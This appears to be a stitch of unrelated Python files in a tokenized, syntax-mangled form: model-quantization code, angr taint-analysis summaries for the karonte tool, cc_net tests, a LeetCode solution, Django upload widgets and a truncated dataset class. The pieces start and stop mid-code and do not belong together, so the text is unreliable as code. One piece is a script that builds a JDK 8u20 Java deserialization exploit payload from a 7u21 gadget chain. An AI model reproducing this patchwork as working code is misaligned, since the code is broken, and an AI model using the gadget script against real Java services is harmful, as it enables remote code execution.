mode')<line_sep><return>self._preset_conversion_algo.run(model)<block_end><def_stmt>_quantize_model self model<block_start>logger.info('Start quantization')<line_sep><return>self._quantization_algo.run(model)<block_end><def_stmt>_search_optimal_parameters self model<block_start>logger.info('Start parameters grid search')<line_sep><return>self._grid_search_algo.run(model)<block_end><def_stmt>_quantize_and_evaluate self model quantization_algo print_progress=<true><block_start><def_stmt>calculate_accuracy_drop <block_start><return>{metric_name:params.comparator(self._baseline_metric[metric_name]-quantized_metrics[metric_name])<for>metric_name,params self._metrics_config.items()}<block_end>quantized_model=quantization_algo(model)<line_sep>logger.info('Start compressed model 
inference')<line_sep>quantized_metrics,quantized_metrics_per_sample=self._evaluate_model(model=quantized_model per_sample_subset_indices=self._diff_subset_indices print_progress=print_progress)<line_sep>logger.info('Fully quantized metrics: %s' quantized_metrics)<line_sep>metrics_accuracy_drop=calculate_accuracy_drop()<line_sep>logger.info('Accuracy drop: %s' metrics_accuracy_drop)<line_sep><return>quantized_model metrics_accuracy_drop quantized_metrics_per_sample<block_end><def_stmt>_drop_restrictions_are_met self metrics_accuracy_drop<block_start><return>all(metrics_accuracy_drop[name]<le>self._max_drop_by_name[name]<for>name self._metrics_config)<block_end><def_stmt>_save_intermediate_model self model<block_start>save_model(model self._config.intermediate_log_dir model_name='intermediate_model')<line_sep>logger.debug('Intermediate model is saved in %s' self._config.intermediate_log_dir)<block_end><def_stmt>_create_hardest_ranking_subset self metrics_per_sample<block_start>worst_ranking_subset=[]<while_stmt>len(worst_ranking_subset)<l>self._config.ranking_subset_size<block_start>needed_subset_size=self._config.ranking_subset_size-len(worst_ranking_subset)<line_sep>top_n_samples=int(np.ceil(needed_subset_size/len(metrics_per_sample.keys())))<line_sep>local_ranking_subset=[]<for_stmt>metric_name metrics_per_sample<block_start>ranking_subset=self._get_ranking_subset(metrics_per_sample metric_name len(worst_ranking_subset))<line_sep>local_ranking_subset.extend(ranking_subset[:top_n_samples])<block_end>worst_ranking_subset.extend(list(set(local_ranking_subset)))<block_end><return>list(set(worst_ranking_subset))<block_end><def_stmt>_evaluate_model self model per_sample_subset_indices=<none> subset_indices=<none> print_progress=<true><block_start>metrics,metrics_per_sample=evaluate_model(model self._engine self._dataset_size subset_indices print_progress self._metrics_config per_sample_subset_indices self._output_node_name 
self._stats_layout)<line_sep>predict_step_size=self._dataset_size<if><not>subset_indices<else>len(subset_indices)<line_sep>logger.update_progress(predict_step_size)<line_sep><return>metrics metrics_per_sample<block_end><def_stmt>_request_alt_statistics self model<block_start><pass><block_end><def_stmt>_get_num_of_quantized_ops self model<block_start><return>get_num_of_quantized_ops(model self._graph_transformer.fq_removal.quantize_operations)<block_end>@staticmethod<def_stmt>_get_result_aa metrics_accuracy_drop num_of_reverted_layers<block_start><try_stmt><block_start><return>str({'final_drop':dict(metrics_accuracy_drop) 'num_of_reverted_layers':num_of_reverted_layers})<block_end><except_stmt>Exception<as>e# pylint: disable=broad-except <block_start>logger.info("Error occurred while trying to send telemetry. Details:"+str(e))<line_sep><return>str(<none>)<block_end><block_end>@staticmethod<def_stmt>_create_quantization_algo algo_config name engine<block_start>algo=COMPRESSION_ALGORITHMS.get(algo_config.base_algorithm)(algo_config engine)<line_sep>algo.name=name<line_sep><return>algo<block_end><block_end>
<import_stmt>yaml<import_from_stmt>javaSerializationTools JavaString JavaField JavaObject JavaEndBlock<import_from_stmt>javaSerializationTools ObjectRead<import_from_stmt>javaSerializationTools ObjectWrite<if_stmt>__name__<eq>'__main__'<block_start><with_stmt>open("../files/7u21.ser" "rb")<as>f<block_start>a=ObjectRead(f)<line_sep>obj=a.readContent()<line_sep># 第一步,向HashSet添加一个假字段,名字fake signature=JavaString("Ljava/beans/beancontext/BeanContextSupport;")<line_sep>fakeSignature={'name':'fake' 'signature':signature}<line_sep>obj.javaClass.superJavaClass.fields.append(fakeSignature)<line_sep># 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler # 读取BeanContextSupportClass的类的简介 <with_stmt>open('BeanContextSupportClass.yaml' 'r')<as>f1<block_start>BeanContextSupportClassDesc=yaml.load(f1.read() Loader=yaml.FullLoader)<block_end># 向beanContextSupportObject添加beanContextChildPeer属性 beanContextSupportObject=JavaObject(BeanContextSupportClassDesc)<line_sep>beanContextChildPeerField=JavaField('beanContextChildPeer' JavaString('Ljava/beans/beancontext/BeanContextChild') beanContextSupportObject)<line_sep>beanContextSupportObject.fields.append([beanContextChildPeerField])<line_sep># 向beanContextSupportObject添加serializable属性 serializableField=JavaField('serializable' 'I' 1)<line_sep>beanContextSupportObject.fields.append([serializableField])<line_sep># 向beanContextSupportObject添加objectAnnontations 数据 beanContextSupportObject.objectAnnotation.append(JavaEndBlock())<line_sep>AnnotationInvocationHandler=obj.objectAnnotation[2].fields[0][0].value<line_sep>beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)<line_sep># 把beanContextSupportObject对象添加到fake属性里 fakeField=JavaField('fake' fakeSignature['signature'] beanContextSupportObject)<line_sep>obj.fields[0].append(fakeField)<block_end><with_stmt>open("8u20.ser" 'wb')<as>f<block_start>o=ObjectWrite(f)<line_sep>o.writeContent(obj)<block_end><block_end>
""" Though karonte relies on angr's sim procedures, sometimes these add in the current state some constraints to make the used analysis faster. For example, if a malloc has an unconstrained size, angr add the constraint size == angr-defined.MAX_SIZE. Though this makes the analysis faster, it makes impossible to reason about the maximum buffer sizes (as needed by karonte). In this module we wrap sim procedures to avoid them to add such constraints. Note however, that the semantic of an expression might get lost. Eg. strlen(taint_x) = taint_y, taint_y is an unconstrained variable """<import_from_stmt>taint_analysis.coretaint *<def_stmt>_get_function_name addr p<block_start>""" Return a function name :param addr: function address :param p: angr project :return: function name """<line_sep><return>p.loader.find_plt_stub_name(addr)<block_end><def_stmt>source_dummy *_ **__<block_start><pass><block_end><def_stmt>memcmp_unsized _core _ plt_path<block_start>""" memcmp-like unsized (e.g., strlen) function summary :param _core: core taint engine :param _: not used :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>dst_reg=arg_reg_name(p 0)<line_sep>src_reg=arg_reg_name(p 1)<line_sep>b1=_core.safe_load(plt_path getattr(plt_path.active[0].regs dst_reg))<line_sep>b2=_core.safe_load(plt_path getattr(plt_path.active[0].regs src_reg))<if_stmt><not>_core.is_tainted(b1 plt_path)<block_start>b1=<none><block_end><if_stmt><not>_core.is_tainted(b2 plt_path)<block_start>b2=<none><block_end># if either of the two is not tainted, we untaint the other <if_stmt>b1<is><not><none><and>b2<is><none><block_start>_core.do_recursive_untaint(b1 plt_path)<block_end><elif_stmt>b2<is><not><none><and>b1<is><none><block_start>_core.do_recursive_untaint(b2 plt_path)<block_end># step into it plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcmp_unsized: Summary function relies on angr's "<concat>"sim procedure, add option 
use_sim_procedures to the loader"<line_sep>plt_path.step()<block_end><def_stmt>memcmp_sized _core _ plt_path<block_start>""" memcmp-like sized (e.g., memcmp) function summary :param _core: core taint engine :param _: not used :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>dst_reg=arg_reg_name(p 0)<line_sep>src_reg=arg_reg_name(p 1)<line_sep>reg_n=arg_reg_name(p 2)<line_sep>b1=_core.safe_load(plt_path getattr(plt_path.active[0].regs dst_reg))<line_sep>b2=_core.safe_load(plt_path getattr(plt_path.active[0].regs src_reg))<line_sep>n=_core.safe_load(plt_path getattr(plt_path.active[0].regs reg_n))<line_sep># we untaint buffers only if n is not tainted <if_stmt><not>_core.is_tainted(n plt_path)<block_start><if_stmt><not>_core.is_tainted(b1 plt_path)<block_start>b1=<none><block_end><if_stmt><not>_core.is_tainted(b2 plt_path)<block_start>b2=<none><block_end># if either of the two is not tainted, we untaint the other <if_stmt>b1<is><not><none><and>b2<is><none><block_start>_core.do_recursive_untaint(b1 plt_path)<block_end><elif_stmt>b2<is><not><none><and>b1<is><none><block_start>_core.do_recursive_untaint(b2 plt_path)<block_end><block_end># step into it plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcmp_sized: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<block_end><def_stmt>memcpy_sized _core call_site_path plt_path<block_start>""" memcpy-like sized (e.g., memcpy) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep># if the second parameter is tainted (or pointing to a tainted location) # or the third is tainted, we taint the first too dst_reg=arg_reg_name(p 0)<line_sep>dst=getattr(plt_path.active[0].regs dst_reg)<line_sep>dst_loaded=_core.safe_load(plt_path 
dst)<line_sep>src_reg=arg_reg_name(p 1)<line_sep>src=getattr(plt_path.active[0].regs src_reg)<line_sep>src_loaded=_core.safe_load(plt_path src)<line_sep>reg_n=arg_reg_name(p 2)<line_sep>n=getattr(plt_path.active[0].regs reg_n)<line_sep># n_loaded = _core.safe_load(plt_path_cp, size) plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcpy_sized: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<if_stmt><not>plt_path.active<block_start><raise>Exception("size of function has no active successors, not walking this path...")<block_end># apply taint to dst if source is tainted and constrain this buffer # TODO take N into account <if_stmt>_core.is_tainted(src_loaded path=plt_path)<block_start>src_loaded_full=_core.safe_load(plt_path src estimate_size=<true>)<line_sep>new_dst_t=_core.get_sym_val(name=_core.taint_buf bits=src_loaded_full.length).reversed<line_sep>_core.add_taint_glob_dep(new_dst_t src_loaded_full plt_path)<line_sep>plt_path.active[0].add_constraints(src_loaded_full<eq>new_dst_t)<line_sep>plt_path.active[0].memory.store(dst new_dst_t)<block_end># untaint if the size is constrained <if_stmt>(_core.is_tainted(dst path=plt_path)<or>_core.is_tainted(dst_loaded path=plt_path))<and><not>_core.is_tainted(n path=plt_path)# do untaint <block_start>_core.do_recursive_untaint(dst_loaded plt_path)<block_end><block_end><def_stmt>memcpy_unsized _core call_site_path plt_path<block_start>""" memcpy-like unsize (e.g., strcpy) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>dst_reg=arg_reg_name(p 0)<line_sep>dst=getattr(plt_path.active[0].regs dst_reg)<line_sep># dst_loaded = _core.safe_load(plt_path_cp, dst, estimate_size=True) src_reg=arg_reg_name(p 1)<line_sep>src=getattr(plt_path.active[0].regs 
src_reg)<line_sep>src_loaded=_core.safe_load(plt_path src)<line_sep># run the sim procedure plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcpy_unsized: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<if_stmt><not>plt_path.active<block_start><raise>Exception("size of function has no active successors, not walking this path...")<block_end># apply taint to dst if source is tainted and constrain this buffer <if_stmt>_core.is_tainted(src_loaded path=plt_path)<block_start>src_loaded_full=_core.safe_load(plt_path src estimate_size=<true>)<line_sep>new_dst_t=_core.get_sym_val(name=_core.taint_buf bits=src_loaded_full.length).reversed<line_sep>_core.add_taint_glob_dep(new_dst_t src_loaded_full plt_path)<line_sep>plt_path.active[0].add_constraints(src_loaded_full<eq>new_dst_t)<line_sep>plt_path.active[0].memory.store(dst new_dst_t)<block_end><block_end><def_stmt>is_size_taint v<block_start><return>'__size__'<in>str(v)<block_end><def_stmt>sizeof _core call_site_path plt_path<block_start>""" sizeof-like (e.g., strlen) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>n=getattr(plt_path.active[0].regs arg_reg_name(p 0))<line_sep>cnt=_core.safe_load(plt_path n _core.taint_buf_size/8)<line_sep># use the sim procedure to continue to the next state and add constraints plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "sizeof: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<if_stmt><not>plt_path.active<block_start><raise>Exception("size of function has no active successors, not walking this path...")<block_end>return_value=getattr(plt_path.active[0].regs ret_reg_name(p))<line_sep># TODO: check if the constraints set by angr sim 
procedure are correct # if there is a tainted buffer in one of the registers then also taint this variable <if_stmt>_core.is_tainted(cnt path=plt_path)<or>_core.is_tainted(n path=plt_path)<block_start>t=_core.get_sym_val(name=(_core.taint_buf+'__size__') bits=p.arch.bits).reversed<line_sep>_core.add_taint_glob_dep(t cnt plt_path)<line_sep># constrain output of this variable equal to the output of sizeof and add it to the return register plt_path.active[0].add_constraints(return_value<eq>t)<line_sep>setattr(plt_path.active[0].regs ret_reg_name(p) t)<block_end><block_end># # Heap functions # <def_stmt>_malloc _core _ plt_path<block_start>""" maclloc function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>state=plt_path.active[0]<line_sep>sim_size=getattr(state.regs arg_reg_name(p 0))<line_sep># when the size is symbolic, choose the maximum size possible <if_stmt>state.solver.symbolic(sim_size)<block_start>size=state.solver.max(sim_size)<if_stmt>size<g>state.libc.max_variable_size<block_start>size=state.libc.max_variable_size<block_end>setattr(state.regs arg_reg_name(p 0) size)<block_end># use the sim procedure plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "malloc: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<line_sep><return>sim_size<block_end><def_stmt>_realloc _core _ plt_path<block_start>""" realloc function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>state=plt_path.active[0]<line_sep>sim_size=getattr(state.regs arg_reg_name(p 1))<line_sep># ptr = getattr(state.regs, arg_reg_name(p, 0)) # when the size is symbolic, choose the maximum size possible 
<if_stmt>state.solver.symbolic(sim_size)<block_start>size=state.solver.max(sim_size)<if_stmt>size<g>state.libc.max_variable_size<block_start>size=state.libc.max_variable_size<block_end>setattr(state.regs arg_reg_name(p 0) size)<block_end># if the size is not tainted, use the sim procedure plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "realloc: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<line_sep><return>sim_size<block_end><def_stmt>heap_alloc _core call_site_path plt_path<block_start>""" Heap allocation function stub :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>fname=_get_function_name(plt_path.active[0].addr _core.p)<line_sep>sim_size=<none><if_stmt>fname<eq>'malloc'<block_start>sim_size=_malloc(_core call_site_path plt_path)<block_end><elif_stmt>fname<eq>'realloc'<block_start>sim_size=_realloc(_core call_site_path plt_path)<block_end><else_stmt><block_start>print(f"Implement this heap alloc: {fname}")<block_end><if_stmt>sim_size<is><not><none><block_start>taint_args=[l<for>l sim_size.recursive_leaf_asts<if>_core.is_tainted(l call_site_path)]<if_stmt>taint_args<and>len(set(taint_args))<eq>1<block_start>arg=taint_args[0]<if_stmt>is_size_taint(arg)<block_start>_core.do_recursive_untaint(arg plt_path)<block_end><block_end><block_end><block_end># # Env function # env_var={}<def_stmt>_setenv _core _ plt_path<block_start>""" setenv function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep><global>env_var<line_sep>p=_core.p<line_sep>plt_path_cp=plt_path.copy(deep=<true>)<line_sep>plt_state_cp=plt_path_cp.active[0]<line_sep># add the environment variable to the list of env_variables with this key key=getattr(plt_path.active[0].regs arg_reg_name(p 
0))<line_sep>env_var[str(key)]=getattr(plt_path.active[0].regs arg_reg_name(p 1))<line_sep># this call can continue with an empty sim procedure since it does nothing next_state=plt_state_cp.step()<line_sep>_core.p.hook(next_state.addr ReturnUnconstrained())<line_sep>plt_path.step().step()<block_end><def_stmt>_getenv _core call_site_addr plt_path<block_start>""" getenv function summary :param _core: core taint engine :param call_site_addr: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep><global>env_var<line_sep>p=_core.p<line_sep>env_var_size=_core.taint_buf_size<line_sep>reg=getattr(plt_path.active[0].regs arg_reg_name(p 0))<line_sep>cnt_mem=_core.safe_load(plt_path reg)<line_sep>key=str(reg)<line_sep># this info is passed by some user controllable source <if_stmt>_core.is_tainted(reg path=plt_path)<or>_core.is_tainted(cnt_mem path=plt_path)<block_start>to_store=_core.get_sym_val(name=_core.taint_buf bits=env_var_size)<block_end># it was set before <elif_stmt>key<in>env_var<block_start>to_store=env_var[key]<block_end># fresh symbolic var <else_stmt><block_start>to_store=_core.get_sym_val(name="env_var" bits=env_var_size)<block_end># store the symbolic buffer at the memory address addr=plt_path.active[0].heap.allocate(env_var_size)<line_sep>plt_path.active[0].memory.store(addr to_store)<line_sep># use an empty hook as sim procedure to continue with the program plt_path_cp=plt_path.copy(deep=<true>)<line_sep>plt_state_cp=plt_path_cp.active[0]<line_sep>next_state=plt_state_cp.step()<line_sep>_core.p.hook(next_state.addr ReturnUnconstrained())<line_sep>plt_path.step().step()<line_sep># set the return address to the pointer setattr(plt_path.active[0].regs ret_reg_name(p) addr)<block_end><def_stmt>env _core call_site_path plt_path<block_start>""" Summarize environment functions (getenv, and setenv) :param _core: core taint engin :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., 
call_site.step()) :return: """<line_sep>fname=_get_function_name(plt_path.active[0].addr _core.p)<if_stmt>fname<eq>'setenv'<block_start>_setenv(_core call_site_path plt_path)<block_end><elif_stmt>fname<eq>'getenv'<block_start>_getenv(_core call_site_path plt_path)<block_end><else_stmt><block_start>print(f"Implement this Env function: {fname}")<block_end># return the env_var if tainted to store for bug_finders <block_end># # Numerical # <def_stmt>atoi _core _ plt_path<block_start>p=_core.p<line_sep>state=plt_path.active[0]<line_sep>val=getattr(state.regs arg_reg_name(p 0))<if_stmt>_core.is_or_points_to_tainted_data(val plt_path)<block_start>addr=plt_path.active[0].memory.load(val p.arch.bytes)<line_sep>_core.do_recursive_untaint(addr plt_path)<block_end>plt_path.step().step()<block_end>
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. # <import_stmt>json<import_from_stmt>pathlib Path<import_stmt>pytest<import_stmt>cc_net<import_stmt>cc_net.minify<as>minify<import_from_stmt>cc_net jsonql process_wet_file<import_from_stmt>cc_net.minify HASH_SIZE decode_hashes encode_hashes encode_line_ids get_hashes <def_stmt>test_encode_decode <block_start>sentences=["Hello world !" "Is everyone happy in here ?"]<line_sep>hashes=get_hashes(sentences)<assert_stmt>all([len(h)<eq>HASH_SIZE<for>h hashes])<line_sep>hashes_int=[minify._b2i(h)<for>h hashes]<line_sep>encoded=encode_hashes(hashes)<line_sep>decoded=decode_hashes(encoded)<assert_stmt>all([len(d)<eq>HASH_SIZE<for>d decoded])<line_sep>decoded_int=[minify._b2i(d)<for>d decoded]<assert_stmt>hashes_int<eq>decoded_int<assert_stmt>hashes<eq>decoded<block_end><def_stmt>test_minify <block_start>doc={"raw_content":"Hello world !\nIs everyone happy in here ?" "language":"en" "perplexity":120.0 "line_ids":[0 4] }<line_sep>expected={"line_ids":"AAAEAA==" "language":"en" "perplexity":120.0}<line_sep>minifier=minify.Minifier()<assert_stmt>expected<eq>minifier(doc)<block_end>@pytest.fixture<def_stmt>http_from_disk monkeypatch<block_start><def_stmt>read_sample_file url:str n_retry:int=3<arrow>bytes<block_start>expected_url=process_wet_file.WET_URL_ROOT+"/crawl-data/sample.warc.wet"<assert_stmt>expected_url<eq>url<line_sep>file=Path(__file__).parent/"data"/"sample.warc.txt"<line_sep><return>file.read_bytes()<block_end>monkeypatch.setattr(cc_net.jsonql "request_get_content" read_sample_file)<block_end><def_stmt>test_minify_and_fetch http_from_disk tmp_path:Path<block_start>full_quotes="""Don't part with your illusions. When they are gone you may still exist, but you have ceased to live. Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge. 
Facts are stubborn things, but statistics are more pliable. Fiction is obliged to stick to possibilities. Truth isn't."""<line_sep># We don't need no education. chosen_quotes="\n".join(l<for>l full_quotes.splitlines()<if>"Education"<not><in>l)<line_sep>cc_doc={"url":"http://sample_english.com" "date_download":"2019-03-18T00:00:00Z" "digest":"sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER" "source_domain":"sample_english.com" "title":"Famous Mark Twain Quotes" "raw_content":full_quotes "cc_segment":"crawl-data/sample.warc.wet" "nlines":4 "length":353 }<line_sep>ccnet_metadata={"language":"en" "language_score":0.99 "perplexity":151.5 "bucket":"head" "raw_content":chosen_quotes "nlines":3 "length":len(chosen_quotes) "original_nlines":4 "original_length":353 "line_ids":[0 2 3] }<line_sep>ccnet_doc=dict(cc_doc **ccnet_metadata)<line_sep>mini=minify.Minifier()(ccnet_doc.copy())<assert_stmt>mini<is><not>ccnet_doc<line_sep>important_fields=["url" "digest" "cc_segment" "language" "language_score" "perplexity" "bucket" "line_ids" ]<line_sep>expected={k:ccnet_doc[k]<for>k important_fields}<line_sep>expected["line_ids"]=encode_line_ids(expected["line_ids"])# type: ignore <assert_stmt>expected<eq>mini<with_stmt>jsonql.open_write(tmp_path/"sample.json")<as>o<block_start>print(json.dumps(mini) file=o)<block_end>fetcher=minify.MetadataFetcher(tmp_path)<line_sep># line_ids is removed when unminifying ccnet_doc.pop("line_ids")<assert_stmt>ccnet_doc<eq>fetcher(cc_doc)<block_end><def_stmt>test_fetch http_from_disk tmp_path:Path<block_start>mini_docs=[{"url":"http://sample_chinese.com" "digest":"sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ" "cc_segment":"crawl-data/sample.warc.wet" "line_ids":encode_line_ids([2]) "bucket":"not_that_great" } {"url":"http://sample_english.com" "digest":"sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER" "cc_segment":"crawl-data/sample.warc.wet" "line_ids":encode_line_ids([3]) "bucket":"top_notch" } 
]<with_stmt>jsonql.open_write(tmp_path/"sample.json")<as>o<block_start><for_stmt>mini mini_docs<block_start>print(json.dumps(mini) file=o)<block_end><block_end>fetcher=minify.MetadataFetcher(tmp_path)<line_sep>cc=process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])<line_sep>docs=[d<for>d fetcher.map(cc)<if>d<is><not><none>]<assert_stmt>cc.retrieved_segments<eq>1<line_sep># Note: documents are retrieved as they are ordered in the .warc.wet file <assert_stmt>["Facts are stubborn things, but statistics are more pliable." "事實是固執的東西,但統計數字卻比較柔和。" ]<eq>[d["raw_content"]<for>d docs]<assert_stmt>["top_notch" "not_that_great"]<eq>[d["bucket"]<for>d docs]<block_end>
<class_stmt>Solution# @param {string} s1 # @param {string} s2 # @param {string} s3 # @return {boolean} <block_start><def_stmt>isInterleave self s1 s2 s3<block_start>m=len(s1)<line_sep>n=len(s2)<if_stmt>m+n<ne>len(s3)<block_start><return><false><block_end>table=[([<false>]<times>(m+1))<for>i range(n+1)]<line_sep>table[0][0]=<true><for_stmt>i range(1 m+1)<block_start><if_stmt>s3[i-1]<eq>s1[i-1]<and>table[0][i-1]<eq><true><block_start>table[0][i]=<true><block_end><block_end><for_stmt>i range(1 n+1)<block_start><if_stmt>s3[i-1]<eq>s2[i-1]<and>table[i-1][0]<eq><true><block_start>table[i][0]=<true><block_end><block_end><for_stmt>i range(1 n+1)<block_start><for_stmt>j range(1 m+1)<block_start><if_stmt>s3[i+j-1]<eq>s2[i-1]<and>table[i-1][j]<eq><true><block_start>table[i][j]=<true><block_end><if_stmt>s3[i+j-1]<eq>s1[j-1]<and>table[i][j-1]<eq><true><block_start>table[i][j]=<true><line_sep><return>table[n][m]<block_end><block_end><block_end><block_end><block_end>
"""Tools for creating and manipulating event schedules and traffic matrices"""<import_from_stmt>fnss.traffic.eventscheduling *<import_from_stmt>fnss.traffic.trafficmatrices *<line_sep>
<import_stmt>mimetypes<import_from_stmt>django.contrib.staticfiles.storage staticfiles_storage<import_from_stmt>django.core signing<import_from_stmt>django.forms widgets<import_from_stmt>django.forms.utils flatatt<import_from_stmt>django.utils.safestring mark_safe<import_from_stmt>django.utils.html format_html<import_from_stmt>django.utils.translation ugettext_lazy<as>_<import_from_stmt>djng app_settings<class_stmt>DropFileWidget(widgets.Widget)<block_start>signer=signing.Signer()<def_stmt>__init__ self area_label fileupload_url attrs=<none><block_start>self.area_label=area_label<line_sep>self.fileupload_url=fileupload_url<line_sep>super(DropFileWidget self).__init__(attrs)<line_sep>self.filetype='file'<block_end><def_stmt>render self name value attrs=<none> renderer=<none><block_start><import_from_stmt>django.contrib.staticfiles.storage staticfiles_storage<line_sep>extra_attrs=dict(attrs)<line_sep>extra_attrs.update({'name':name 'class':'djng-{}-uploader'.format(self.filetype) 'djng-fileupload-url':self.fileupload_url 'ngf-drop':'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype **attrs) 'ngf-select':'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype **attrs) })<line_sep>self.update_attributes(extra_attrs value)<line_sep>final_attrs=self.build_attrs(self.attrs extra_attrs=extra_attrs)<line_sep>elements=[format_html('<textarea {}>{}</textarea>' flatatt(final_attrs) self.area_label)]<line_sep># add a spinnging wheel spinner_attrs={'class':'glyphicon glyphicon-refresh glyphicon-spin' 'ng-cloak':<true> }<line_sep>elements.append(format_html('<span {}></span>' flatatt(spinner_attrs)))<line_sep># add a delete icon icon_attrs={'src':staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)) 'class':'djng-btn-trash' 'title':_("Delete File") 'djng-fileupload-button ':<true> 'ng-click':'deleteImage("{id}", "{ng-model}")'.format(**attrs) 'ng-cloak':<true> }<line_sep>elements.append(format_html('<img {} />' 
flatatt(icon_attrs)))<line_sep># add a download icon <if_stmt>value<block_start>download_attrs={'href':value.url 'class':'djng-btn-download' 'title':_("Download File") 'download':<true> 'ng-cloak':<true> }<line_sep>download_icon=staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))<line_sep>elements.append(format_html('<a {}><img src="{}" /></a>' flatatt(download_attrs) download_icon))<block_end><return>format_html('<div class="drop-box">{}</div>' mark_safe(''.join(elements)))<block_end><def_stmt>update_attributes self attrs value<block_start><if_stmt>value<block_start><try_stmt><block_start>content_type,_=mimetypes.guess_type(value.file.name)<line_sep>extension=mimetypes.guess_extension(content_type)[1:]<block_end><except_stmt>(IOError IndexError TypeError)<block_start>extension='_blank'<block_end>background_url=staticfiles_storage.url('djng/icons/{}.png'.format(extension))<line_sep>attrs.update({'style':'background-image: url({});'.format(background_url) 'current-file':self.signer.sign(value.name)})<block_end><block_end><block_end><class_stmt>DropImageWidget(DropFileWidget)<block_start><def_stmt>__init__ self area_label fileupload_url attrs=<none><block_start>super(DropImageWidget self).__init__(area_label fileupload_url attrs=attrs)<line_sep>self.filetype='image'<block_end><def_stmt>update_attributes self attrs value<block_start><if_stmt>value<block_start>background_url=self.get_background_url(value)<if_stmt>background_url<block_start>attrs.update({'style':'background-image: url({});'.format(background_url) 'current-file':self.signer.sign(value.name)})<block_end><block_end><block_end><def_stmt>get_background_url self value<block_start><import_from_stmt>easy_thumbnails.exceptions InvalidImageFormatError<import_from_stmt>easy_thumbnails.files 
get_thumbnailer<try_stmt><block_start>thumbnailer=get_thumbnailer(value)<line_sep>thumbnail=thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)<line_sep><return>thumbnail.url<block_end><except_stmt>InvalidImageFormatError<block_start><return><block_end><block_end><block_end>
# Copyright (c) 2021 Graphcore Ltd. All rights reserved. # Copyright 2021 RangiLyu. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This file has been modified by Graphcore Ltd. <import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>.xml_dataset XMLDataset<import_from_stmt>utils logger<if_stmt>logger.GLOBAL_LOGGER<is><not><none><block_start>print=logger.GLOBAL_LOGGER.log_str<block_end><def_stmt>calc_area boxes# boxes: n,4 # return <block_start>x1,y1,x2,y2=np.split(boxes 4 1)<line_sep>areas=(y2-y1)<times>(x2-x1)# n,1 <return>areas[: 0]<block_end><class_stmt>XMLDatasetForRcnn(XMLDataset)<block_start><def_stmt>__init__ self preset_indices=<none> area_filter_thrd=0.0 num_gtboxes=20 specified_length=<none> extra_layer=<none> **kwargs<block_start>self.area_filter_thrd=area_filter_thrd<line_sep>self.num_gtboxes=num_gtboxes<line_sep>self.preset_indices=preset_indices<line_sep>self._cur_for_preset_indices=0<line_sep>super(XMLDatasetForRcnn self).__init__(**kwargs)<line_sep>self.real_length=len(self.data_info)<line_sep>self.length=self.real_length<times>2<if>specified_length<is><none><else>specified_length<line_sep>self.extra_layer=extra_layer<block_end><def_stmt>get_train_data self idx<block_start>""" Load image and annotation :param idx: :return: meta-data (a dict containing image, annotation and other information) filter zero area boxes 
